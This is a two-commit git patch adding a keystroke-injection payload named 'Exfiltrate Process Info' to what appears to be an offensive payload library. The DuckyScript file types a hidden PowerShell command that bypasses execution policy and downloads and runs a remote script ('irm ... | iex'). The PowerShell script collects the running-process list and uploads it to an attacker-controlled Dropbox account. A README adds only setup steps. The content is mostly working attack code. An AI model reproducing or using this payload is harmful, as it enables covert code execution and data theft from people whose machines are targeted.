From 9adf9357ad1977b5a28b27f2d932ffafd9b7ec64 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 12:04:54 +0200 Subject: [PATCH 1/2] Exfiltrate Process Info --- .../ExfiltrateProcessInfo_Windows/payload.txt | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt new file mode 100644 index 0000000..1b02c91 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt @@ -0,0 +1,26 @@ +REM ########################################## +REM # | +REM # Title : Exfiltrate Process Info | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM ########################################## + +REM Requirements: +REM - Internet Connection +REM - Dropbox Webhook + +REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1 +DEFINE PAYLOAD example.com + + +DELAY 2000 +GUI r +DELAY 250 +DELETE +STRING powershell -w h -ep bypass irm +STRING PAYLOAD +STRING | iex +ENTER From 0c984bd819be5e3d3eca1f04d4775c9949ee2c3a Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 12:05:46 +0200 Subject: [PATCH 2/2] script --- .../ExfiltrateProcessInfo.ps1 | 36 +++++++++++++++++++ .../ExfiltrateProcessInfo_Windows/README.md | 36 +++++++++++++++++++ 2 files changed, 72 insertions(+) create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1 create mode 100644 payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1 b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1 new file mode 100644 index 0000000..adf09aa --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1 @@ -0,0 +1,36 @@ +<# +This function uploads the content of a file called "tasklist_output.txt" to Dropbox using Dropbox API. + +Firstly, a temporary file is created using the New-TemporaryFile cmdlet of PowerShell. + +Then, the tasklist /v command is used to get the running processes output on the computer. + +The output is then written to the temporary file using the Out-File cmdlet. + +The Dropbox API endpoint for uploading a file is set, and the API parameters such as the destination path of the file on Dropbox and access credentials are specified. + +Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST request to the Dropbox API and upload the file. +#> +function ExfiltrateProcessInfo { + $localFilePath = New-TemporaryFile + $taskListOutput = tasklist /v + $taskListOutput | Out-File -FilePath $localFilePath + $dropboxFilePath = "/tasklist_output.txt" + + # Required - Set here your Dropbox Token + $accessToken = "example.com" + $authHeader = @{Authorization = "Bearer $accessToken"} + + $fileContent = Get-Content $localFilePath + + $uploadUrl = "https://content.dropboxapi.com/2/files/upload" + + $headers = @{} + $headers.Add("Authorization", "Bearer $accessToken") + $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}') + $headers.Add("Content-Type", "application/octet-stream") + + Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent +} + +ExfiltrateProcessInfo \ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md new file mode 100644 index 0000000..17fec93 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md @@ -0,0 +1,36 @@ +# Exfiltrate Process Info - Windows ✅ + +A script used to exfiltrate process info. + +**Category**: Exfiltration + +## Description + +A script used to exfiltrate process info. + +This function uploads the content of a file called "tasklist_output.txt" to Dropbox using Dropbox API. + +Firstly, a temporary file is created using the New-TemporaryFile cmdlet of PowerShell. + +Then, the tasklist /v command is used to get the running processes output on the computer. + +The output is then written to the temporary file using the Out-File cmdlet. + +The Dropbox API endpoint for uploading a file is set, and the API parameters such as the destination path of the file on Dropbox and access credentials are specified. + +Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST request to the Dropbox API and upload the file. + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +### Executing program + +* Plug in your device + +### Settings + +* Dropbox Webhook \ No newline at end of file